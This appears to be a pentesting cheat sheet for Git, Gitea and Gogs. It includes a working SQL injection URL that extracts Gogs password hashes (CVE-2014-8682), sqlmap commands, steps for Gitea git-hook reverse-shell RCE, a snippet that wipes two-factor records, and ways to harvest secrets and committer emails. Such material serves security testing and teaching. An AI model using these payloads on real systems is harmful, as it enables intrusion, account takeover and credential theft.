Create Git Local Server
- [git-scm](https://git-scm.com/book/en/v2/Git-Internals-Transfer-Protocols)
Start Local Git Server (Dumb, HTTP)
cd test_repo
git init
git add . && git commit -m "first commit"
cd .git
# Update the auxiliary files (info/refs, objects/info/packs) that a dumb transport
# needs: a plain HTTP server cannot run git on the client's behalf, so the client
# reads the ref list and object layout from these static files.
# --bare: treat the current directory (.git) as a bare repository (no working directory)
git --bare update-server-info
cd ..
# Serves the current directory on port 8000; clients clone http://<host>:8000/.git
# Dumb HTTP is read-only (clone/fetch only), and the whole working tree, not just
# .git, is exposed to anyone who can reach the port.
python3 -m http.server
Git GitHub Pentesting
Git is software for tracking changes in any set of files. It is usually used together with a hosting service such as GitHub.
Git Commands for the Repository Investigation
Check Information
# Basic information
git show
git show <branch-name>
git show <commit-id>
git show <tag-name>
git --git-dir /path/to/.git show
# Configuration
git config --list
# Commit history
git log
git log --stat
git --git-dir /path/to/.git log --stat
# Differences: working tree vs. index; --staged and --cached are synonyms for index vs. HEAD
git diff
git diff --staged
git diff --cached
# Working tree status
git status
Back to the Previous Commits
# You can get the "commit-id" by 'git log'
git checkout <commit-id>
git --git-dir /path/to/.git checkout <commit-id>
# Return to the latest commit on the default branch (master or main)
git checkout master
git checkout main
Search the Other Branches
To list all branches, including remote-tracking ones.
To create a new branch.
Clone the Repository
git clone https://github.com/username/repo.git
# via SSH
git clone ssh://git-user@10.0.0.1/path/to/repo
git clone ssh://git-user@10.0.0.1/path/to/repo.git
Find Tags
Restore Deleted Files
First off, find the files that were deleted in past commits.
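The following is an added example; it is neither code from this page nor from git itself. It serves two passages: the dumb HTTP server section above (what update-server-info writes, and how a client reads info/refs plus loose objects) and this section (a deleted file stays in the object store, so it can be pulled back from any commit that still references it). Everything is built with hashlib and zlib only, in a temporary directory; the repository contents, identity and secret value are constructed, and trees are flat (no subdirectories).

```python
import hashlib
import os
import tempfile
import zlib


def hash_object(kind, data):
    """Git object id: sha1 over '<kind> <size>\\0<data>'. Returns (hex sha, raw bytes)."""
    raw = kind + b" " + str(len(data)).encode() + b"\0" + data
    return hashlib.sha1(raw).hexdigest(), raw


def write_object(gitdir, kind, data):
    """Store a loose object at objects/xx/yyyy..., zlib-compressed like git does."""
    sha, raw = hash_object(kind, data)
    path = os.path.join(gitdir, "objects", sha[:2], sha[2:])
    os.makedirs(os.path.dirname(path), exist_ok=True)
    with open(path, "wb") as f:
        f.write(zlib.compress(raw))
    return sha


def read_object(gitdir, sha):
    with open(os.path.join(gitdir, "objects", sha[:2], sha[2:]), "rb") as f:
        raw = zlib.decompress(f.read())
    header, _, body = raw.partition(b"\0")
    return header.split()[0].decode(), body


def write_tree(gitdir, files):
    """Flat tree: entries are '<mode> <name>\\0<20 raw sha bytes>', sorted by name."""
    entries = b"".join(
        b"100644 " + name.encode() + b"\0" + bytes.fromhex(write_object(gitdir, b"blob", files[name]))
        for name in sorted(files))
    return write_object(gitdir, b"tree", entries)


def write_commit(gitdir, tree, parent, message):
    ident = b"Alice <alice@example.com> 1700000000 +0000"  # constructed identity
    body = b"tree " + tree.encode() + b"\n"
    if parent:
        body += b"parent " + parent.encode() + b"\n"
    body += b"author " + ident + b"\ncommitter " + ident + b"\n\n" + message.encode() + b"\n"
    return write_object(gitdir, b"commit", body)


def update_server_info(gitdir, refs):
    """The two files `git update-server-info` maintains for dumb transports."""
    os.makedirs(os.path.join(gitdir, "info"), exist_ok=True)
    os.makedirs(os.path.join(gitdir, "objects", "info"), exist_ok=True)
    with open(os.path.join(gitdir, "info", "refs"), "w") as f:
        f.writelines(f"{sha}\t{name}\n" for name, sha in sorted(refs.items()))
    open(os.path.join(gitdir, "objects", "info", "packs"), "w").close()  # no packfiles here


# --- client side: only what a dumb HTTP clone can GET (info/refs + loose objects) ---

def read_refs(gitdir):
    with open(os.path.join(gitdir, "info", "refs")) as f:
        return {name: sha for sha, name in (line.rstrip("\n").split("\t") for line in f)}


def parse_commit(body):
    header, _, message = body.partition(b"\n\n")
    fields = {}
    for line in header.split(b"\n"):
        key, _, value = line.partition(b" ")
        fields.setdefault(key.decode(), []).append(value.decode())
    return fields, message.decode()


def parse_tree(body):
    files, i = {}, 0
    while i < len(body):
        nul = body.index(b"\0", i)
        _mode, name = body[i:nul].split(b" ", 1)
        files[name.decode()] = body[nul + 1:nul + 21].hex()
        i = nul + 21
    return files


def walk_history(gitdir, sha):
    """Yield (commit sha, {path: blob sha}) from the tip back to the root commit."""
    while sha:
        fields, _ = parse_commit(read_object(gitdir, sha)[1])
        yield sha, parse_tree(read_object(gitdir, fields["tree"][0])[1])
        sha = fields.get("parent", [None])[0]


def deleted_files(gitdir, tip):
    """Paths present in a parent commit but gone in its child; the blob is still
    in the object store, so its content comes straight back."""
    history = list(walk_history(gitdir, tip))
    gone = {}
    for (_child, child_files), (_parent, parent_files) in zip(history, history[1:]):
        for path, blob in parent_files.items():
            if path not in child_files:
                gone[path] = read_object(gitdir, blob)[1]
    return gone


def demo(root=None):
    """Two commits, the second deleting .env; publish the dumb way; recover .env."""
    gitdir = os.path.join(root or tempfile.mkdtemp(), ".git")
    secret = b"API_KEY=constructed-example-key\n"  # constructed sample secret
    c1 = write_commit(gitdir, write_tree(gitdir, {"README.md": b"# app\n", ".env": secret}), None, "first commit")
    c2 = write_commit(gitdir, write_tree(gitdir, {"README.md": b"# app\n"}), c1, "remove .env")
    with open(os.path.join(gitdir, "HEAD"), "w") as f:
        f.write("ref: refs/heads/master\n")
    update_server_info(gitdir, {"refs/heads/master": c2})
    tip = read_refs(gitdir)["refs/heads/master"]
    return tip == c2, deleted_files(gitdir, tip)
```

The same walk is what a `.git` dumper does against an exposed directory, and it is why "removing" a secret in a later commit does not remove it from a published repository; the object has to be rewritten out of history and the secret rotated.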
Then restore them.

Local Git server sync commands
Committing code to your local Git server
- It is recommended to get TLS/SSL working
- Make sure to change <domain>, <username>, <email> and <commit_message>
# http.sslVerify=false only matters for an https:// remote; it is needed while the
# server uses a self-signed certificate and should be dropped once the CA is trusted
git -c http.sslVerify=false clone https://git.<domain>/<username>/scripts.git
cd scripts
git config --global user.email "<email>" && git config --global user.name "<username>"
# stage the changes, then commit with a message
git add . && git commit -m "<commit_message>"
git -c http.sslVerify=false push
Gitea Pentesting
Gitea is a self-hosted Git forge: repository hosting with issues, pull requests, webhooks and an HTTP API.
Common Directories
The /explore pages and the search endpoints answer without a login unless REQUIRE_SIGNIN_VIEW is enabled in app.ini; /api/swagger documents every API route.
/api/swagger
/api/v1/repos/search?q=test
/api/v1/users/search?q=test
/api/v1/users/<username>/repos
/explore/organizations
/explore/repos
/explore/users
# OAuth
/.well-known/openid-configuration
/login/oauth/authorize
/login/oauth/access_token
/login/oauth/userinfo
/login/oauth/keys
Investigation
Repositories
If we can access repositories, we may find sensitive information in them, e.g. credentials, subdomains, other domains, secret keys, etc.
So check the source code, including past commits and other branches.
Get Secrets in Web Hooks
In the existing repository, we may find the secret value in the repository → Settings → Web Hooks.
Find User Credentials
If we have a shell on the target system, the repositories pushed to Gitea exist on disk as bare repositories under the path set by ROOT in the [repository] section of app.ini (for example /data/git/repositories in the Docker image), and app.ini itself holds the database credentials and SECRET_KEY, so both are worth reading for credentials.
Git Fetch Remote Code Execution (RCE)
Metasploit
Git Hooks Remote Code Execution (RCE)
CVE-2020-14144
It affects Gitea 1.1.0 through 1.12.5. Editing Git hooks is limited to site administrators (and, from 1.13 on, disabled unless DISABLE_GIT_HOOKS is turned off), so the chain needs an account with that permission; the point is that a documented feature hands whoever holds it code execution on the server.
1. Login
Open the Gitea dashboard and log in with an existing account that is allowed to edit Git hooks.
2. Create a New Repository
3. Go to the Repository’s Settings
In the new repository we’ve created, go to Settings → Git Hooks → post-receive.
4. Update to the Reverse Shell Payload
In the post-receive edit page, replace the hook body with a reverse-shell command. The hook is a shell script that Gitea runs after every push, so it executes on the server as the user Gitea serves Git under; background the command, otherwise the push blocks until the shell exits.
5. Start Listener in Terminal
To catch the outgoing connection from the hook, start a listener on the attacking host.
6. Create the New Repository in Terminal
mkdir test
cd test
touch README.md
git init
git add README.md
git commit -m "first commit"
git remote add origin https://<target-ip>/<username>/test.git
git push -u origin master
After the push, the post-receive hook is triggered and runs the reverse-shell command.
The listener should now have a shell.
Swagger API
We can access /api/swagger to interact with the API through its Swagger UI.
Get New Token & Authorize
We need a token to use the API from Swagger (or directly, by sending the HTTP header Authorization: token <token>).
- Register a new account on the Gitea top page.
- Go to /user/settings/applications and generate a new token.
- Copy the token value, e.g. “fa2c2428817d64c1b890d404a905f7be2ffd4bde”.
- Go to /api/swagger.
- Click the “Authorize” button. The modal window opens.
- Paste the token in the “Token” section.
Delete the Two-Factor
With a shell on the host and a SQLite-backed Gitea, emptying the two_factor table turns TOTP off for every account. This is destructive, so copy gitea.db first.
victim@machine:/gitea/gitea$ python3
>>> import sqlite3
>>> conn=sqlite3.connect('gitea.db')
>>> conn.execute('delete from two_factor')
>>> conn.commit()
>>> conn.close()
Gogs Pentesting
Gogs (Go Git Service) is a self-hosted Git service written in Go, the project Gitea was forked from.
SQL injection (CVE-2014-8682)
Old Gogs releases (0.3.1 through the 0.5.x line) concatenated the q parameter of /api/v1/users/search and /api/v1/repos/search into the query. The /**/ sequences stand in for spaces, and the 28 values after select match the column count of the vulnerable query; the third one smuggles the password hash into a column the endpoint echoes back.
http://127.0.0.1:3000/api/v1/users/search?q=')/**/union/**/all/**/select/**/1,1,(select/**/passwd/**/from/**/user),1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1,1--
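What the payload above does, as an added example that is not Gogs' code and not from the original page: a constructed in-memory SQLite user table with five columns, a stand-in query with the same injection point (user input concatenated into a LIKE clause), the page's payload shape scaled to five columns (with group_concat in place of the page's scalar subquery so every hash comes back in one row), and the parameterised query that neutralises it.

```python
import sqlite3


def make_db():
    """Constructed stand-in for the user table; the real one has far more columns."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, lower_name TEXT, "
                 "name TEXT, email TEXT, passwd TEXT)")
    conn.executemany("INSERT INTO user VALUES (?, ?, ?, ?, ?)", [
        (1, "alice", "alice", "alice@example.com", "pbkdf2-hash-alice"),  # constructed
        (2, "bob", "bob", "bob@example.com", "pbkdf2-hash-bob"),          # constructed
    ])
    return conn


def search_users_vulnerable(conn, q):
    """User input lands inside the SQL text. The endpoint never selects passwd
    itself (the last column is a placeholder), so the attacker has to pull it in."""
    sql = ("SELECT id, lower_name, name, email, '' FROM user "
           f"WHERE lower_name LIKE lower('%{q}%')")
    return conn.execute(sql).fetchall()


def search_users_fixed(conn, q):
    """Bound parameter: quotes, parentheses and comments in q are just characters.
    (% and _ stay LIKE wildcards; add an ESCAPE clause if that matters.)"""
    sql = ("SELECT id, lower_name, name, email, '' FROM user "
           "WHERE lower_name LIKE lower('%' || ? || '%')")
    return conn.execute(sql, (q,)).fetchall()


def union_payload(columns, column_index):
    """The page's payload shape: close the LIKE argument, UNION a row whose
    column_index-th value is the hashes, comment out the rest of the query."""
    cols = ["1"] * columns
    cols[column_index] = "(select/**/group_concat(passwd)/**/from/**/user)"
    return "')/**/union/**/all/**/select/**/" + ",".join(cols) + "--"


def leaked_hashes(conn):
    """Run the attack against the vulnerable query and return the hashes it exposed."""
    for row in search_users_vulnerable(conn, union_payload(5, 2)):
        if isinstance(row[2], str) and "pbkdf2-hash-" in row[2]:
            return set(row[2].split(","))
    return set()
```

The page's 28-column payload is union_payload(28, 2) with the scalar subquery swapped back in; the column count has to match the victim query exactly, which is why a generic UNION probe usually starts by finding that count (ORDER BY n, or sqlmap as below).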
Automation
sqlmap -u "https://example.com/api/v1/repos/search?q=test"
sqlmap -u "https://example.com/api/v1/users/search?q=test"
Git Hooks Remote Code Execution (RCE)
GitHub Dorks
Search Target Repository
You may be able to find the target repository by searching on Google.
The search query looks like "
Find Sensitive Data in the Repository
If you can access the GitHub repository, go through its files and history for sensitive information. For example:
- Hard-coded secrets in the contents
- Past commits
- Files deleted in past commits
- Commit messages
- Email addresses, which may leak personal accounts
- Other branches
For more details, see github-dorks.
Find Email Address
- Click the target repository.
- Move to the commit history.
- Click a commit and add “.patch” to the URL. For example:
- Check the “From” section in the page. You should find the email address of the committer. If the account has commit email privacy enabled, GitHub substitutes an address of the form <id>+<username>@users.noreply.github.com, which still reveals the username.
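Extracting the identity from a “.patch” page, as an added example (not from the original page): GitHub serves the same format as git format-patch, an mbox-style message per commit, so the standard email parser reads the From: line. The sample patch text is constructed, the URL format for commit patches is GitHub's public one, and the noreply check covers the commit email privacy case.

```python
import email
import re
from email.utils import parseaddr

NOREPLY = re.compile(r"@users\.noreply\.github\.com$")
COMMIT_BOUNDARY = re.compile(r"(?m)^(?=From [0-9a-f]{40} )")  # start of each format-patch message


def patch_url(owner, repo, sha):
    """Where the patch view of a commit lives on GitHub."""
    return f"https://github.com/{owner}/{repo}/commit/{sha}.patch"


def committers_from_patch(text):
    """One record per commit in a .patch document: sha, name, email, noreply flag, subject."""
    records = []
    for chunk in COMMIT_BOUNDARY.split(text):
        if not chunk.strip():
            continue
        msg = email.message_from_string(chunk)
        unixfrom = msg.get_unixfrom() or ""          # the leading 'From <sha> <date>' line
        sha = unixfrom.split()[1] if unixfrom.startswith("From ") else None
        name, addr = parseaddr(msg.get("From", ""))
        records.append({
            "sha": sha,
            "name": name,
            "email": addr,
            "noreply": bool(NOREPLY.search(addr)),   # privacy setting on: username still leaks
            "subject": msg.get("Subject", ""),
        })
    return records


# Constructed sample: two commits, the second author using GitHub's noreply address.
SAMPLE_PATCH = """\
From 1111111111111111111111111111111111111111 Mon Sep 17 00:00:00 2001
From: Alice Example <alice@example.com>
Date: Mon, 1 Jan 2024 10:00:00 +0000
Subject: [PATCH 1/2] add deploy script

---
 deploy.sh | 1 +
 1 file changed, 1 insertion(+)

diff --git a/deploy.sh b/deploy.sh
--- /dev/null
+++ b/deploy.sh
@@ -0,0 +1 @@
+echo deploy

From 2222222222222222222222222222222222222222 Mon Sep 17 00:00:00 2001
From: bob <12345+bob@users.noreply.github.com>
Date: Mon, 1 Jan 2024 11:00:00 +0000
Subject: [PATCH 2/2] fix typo

---
 README.md | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
"""

if __name__ == "__main__":
    for rec in committers_from_patch(SAMPLE_PATCH):
        print(rec["sha"][:8], rec["name"], rec["email"], "(noreply)" if rec["noreply"] else "")
```

A pull request's .patch URL bundles every commit the same way, so one fetch can yield several identities; the author of a squashed or rebased commit can differ from the GitHub account that pushed it.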